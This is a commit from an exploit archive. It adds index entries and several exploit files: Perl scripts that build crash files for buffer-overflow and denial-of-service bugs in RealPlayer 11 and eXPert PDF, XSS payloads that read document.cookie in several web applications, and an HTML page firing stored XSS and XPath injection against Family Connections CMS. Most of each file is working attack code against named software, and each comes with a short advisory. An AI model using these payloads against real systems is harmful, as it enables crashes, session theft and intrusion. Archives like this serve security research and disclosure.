Updated 12_10_2014

This commit is contained in:
Offensive Security 2014-12-10 04:52:01 +00:00
parent 6a7030ba10
commit 92c2a90af7
9 changed files with 257 additions and 0 deletions

View file

@ -31965,3 +31965,11 @@ id,file,description,date,author,platform,type,port
35487,platforms/php/dos/35487.php,"PHP 5.x OpenSSL Extension x Function openssl_decrypt Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x HFS Subsystem Information Disclosure Vulnerability",2011-03-21,"Dan Rosenberg",osx,local,0
35489,platforms/multiple/dos/35489.pl,"Perl 5.x 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service Vulnerability",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0
35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA WebAccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0
35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0
35497,platforms/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps,0
35498,platforms/php/webapps/35498.txt,"Ripe Website Manager 1.1 Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-03-24,"High-Tech Bridge SA",php,webapps,0
35499,platforms/php/webapps/35499.txt,"netjukebox 4.01B/5.25 'skin' Parameter Cross Site Scripting Vulnerability",2011-03-24,"AutoSec Tools",php,webapps,0
35500,platforms/php/webapps/35500.txt,"Family Connections 2.3.2 'subject' Parameter HTML Injection Vulnerability",2011-03-25,"Zero Science Lab",php,webapps,0
35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0
35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0

Can't render this file because it is too large.

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47008/info
Advantech/BroadWin SCADA WebAccess is prone to multiple remote vulnerabilities including an information-disclosure issue and a remote code-execution issue.
An attacker can exploit these issues to execute arbitrary code and gain access to sensitive information. Other attacks may also be possible.
Advantech/BroadWin SCADA WebAccess 7.0 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/35495.zip

View file

@ -0,0 +1,59 @@
source: http://www.securityfocus.com/bid/47039/info
RealPlayer is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
RealPlayer 11.0 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
###
# Title : RealPlayer v11.0 (.rmp) Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Buffer Overflow
# Tested on : Windows XP SP3 Fran.ais
# Target : RealPlayer v11.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# -----------------
# XML version : 1.0 in (Real Metadata Package File)
# <?xml version="1.0"?>
# <embed src="rtsp:// **BUFFER ** " autoplay="whatever" />Null
# -----------------
#START SYSTEM /root@MSdos/ :
# -----------------
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |============================================================|\n";
print " |= [!] Name : RealPlayer v11.0 Real Metadata Package File =|\n";
print " |= [!] Exploit : Buffer Overflow =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |============================================================|\n";
sleep(2);
print "\n";
# Parameter OverFlow =>
my $kA = "\x41" x 333 ; # A * 333
my $kB = "\x42" x 333 ; # B * 333
my $kC = "\x43" x 333 ; # C * 333
my $buffer = $kA.$kB.$kC ;
my $header =
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31".
"\x2e\x30\x22\x3f\x3e\x0d\x0d\x3c\x65\x6d\x62\x65\x64\x20\x73\x72".
"\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f\x2f".$buffer."\x22\x20\x61\x75\x74\x6f".
"\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76\x65\x72\x22\x20".
"\x2f\x3e\x00";
# Creating ...
my $kedans = $header ; # |=:: Header & AAA...BBB...CC etc ::=|
open (FILE ,"> Crash.rmp"); # Evil File Here
print FILE $kedans ;
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close (FILE);

27
platforms/php/webapps/35496.txt Executable file
View file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/47014/info
MC Content Manager is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
MC Content Manager 10.1.1 is vulnerable; other versions may also be affected.
<form name="hack" action="http://www.example.com/?module=users" method="post">
<input type="hidden" name="module" value="users">
<input type="hidden" name="action" value="remind">
<input type="hidden" name="user_email" value='"><script>alert(document.cookie)</script>'>
</form>
<form name="hack" action="http://www.example.com/?module=users" method="post">
<input type="hidden" name="module" value="users">
<input type="hidden" name="action" value="register">
<input type="hidden" name="user_email" value='"><script>alert(document.cookie)</script>'>
</form>
<form name="hack" action="http://www.example.com/?module=users" method="post">
<input type="hidden" name="module" value="users">
<input type="hidden" name="action" value="register">
<input type="hidden" name="user_hide" value='"><script>alert(document.cookie)</script>'>
</form>

10
platforms/php/webapps/35497.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/47015/info
GrapeCity Data Dynamics Reports is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Data Dynamics Reports 1.6.2084.14 is vulnerable; other versions may also be affected.
http://www.example.com/CoreHandler.ashx?dd:script=CoreViewerInit.js&reportName=<script>alert(&#039;XSS1!&#039;)</script>&uniqueId=<script>alert(&#039;XSS2!&#039;)</script>#
http://www.example.com/CoreHandler.ashx?dd:script=CoreController.js&uniqueId=<script>alert(&#039;XSS1!&#039;)</script>&traceLevel=<script>alert(&#039;XSS2!&#039;)</script>#

13
platforms/php/webapps/35498.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/47017/info
Ripe Website Manager is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Ripe Website Manager 1.1 is vulnerable; other versions may also be affected.
Ripe Website Manager is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Ripe Website Manager 1.1 is vulnerable; other versions may also be affected.

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47027/info
netjukebox is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
netjukebox 5.25 is vulnerable; other versions may also be affected.
http://www.example.com/netjukebox/message.php?skin=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E

68
platforms/php/webapps/35500.txt Executable file
View file

@ -0,0 +1,68 @@
source: http://www.securityfocus.com/bid/47037/info
Family Connections is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
Family Connections 2.3.2 is vulnerable; other versions may also be affected.
<!--
Family Connections CMS 2.3.2 (POST) Stored XSS And XPath Injection
Vendor: Ryan Haudenschilt
Product web page: http://www.familycms.com
Affected version: 2.3.2
Summary: Family Connections is an open source
content management system. It makes creating a
private, family website easy and fun.
Desc: FCMS suffers from a stored XSS vulnerability
(post-auth) in messageboard.php script thru the
&#039;subject&#039; post parameter. XPath lies in the
/inc/getChat.php script with &#039;users&#039; get parameter with
no args, and post parameter &#039;message&#039;.
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41
Vulnerability discovered by Gjoko &#039;LiquidWorm&#039; Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
Advisory ID: ZSL-2011-5004
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5004.php
22.03.2011
-->
<html>
<title>Family Connections CMS 2.3.2 Stored XSS And XPath Injection</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xpath(){document.forms["xpath"].submit();}
function xss(){document.forms["xss"].submit();}
</script>
<form action="http://FCMS/inc/getChat.php" enctype="application/x-www-form-urlencoded" method="POST" id="xpath">
<input type="hidden" name="message" value="\\&#039;;--\\&#34;;--" /></form>
<a href="javascript: xpath();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit XPath!<h3></center></font></b></a>
<form action="http://FCMS/messageboard.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
<input type="hidden" name="subject" value=&#039;"><script>alert(1)</script>&#039; />
<input type="hidden" name="post" value="waddup" />
<input type="hidden" name="name" value="1" />
<input type="hidden" name="post_submit" value="Submit" /></form>
<a href="javascript: xss();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit XSS!<h3></center></font></b></a>
</body></html>

54
platforms/windows/dos/35502.pl Executable file
View file

@ -0,0 +1,54 @@
source: http://www.securityfocus.com/bid/47040/info
eXPert PDF is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause the application to crash, denying service to legitimate users.
eXPert PDF 7.0.880.0 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
###
# Title : eXPert PDF Batch Creator v7 Denial of Service Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Blocked 'vsbatch2pdf.exe' When Generate
# Tested on : Windows XP SP3 Fran?ais
# Target : eXPert PDF Editor v7.0.880.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Usage : Upload The HTML file in eXPert PDF Batch Creator (vsbatch2pdf.exe) And Start The Generate
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |=============================================|\n";
print " |= [!] Name : eXPert PDF Batch Creator v7 =|\n";
print " |= [!] Exploit : Denial of Service Exploit =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |=============================================|\n";
sleep(2);
print "\n";
my $junk = "http://"."\x41" x 17425;
open(file , ">", "Kedans.html");
print file $junk;
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file);
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================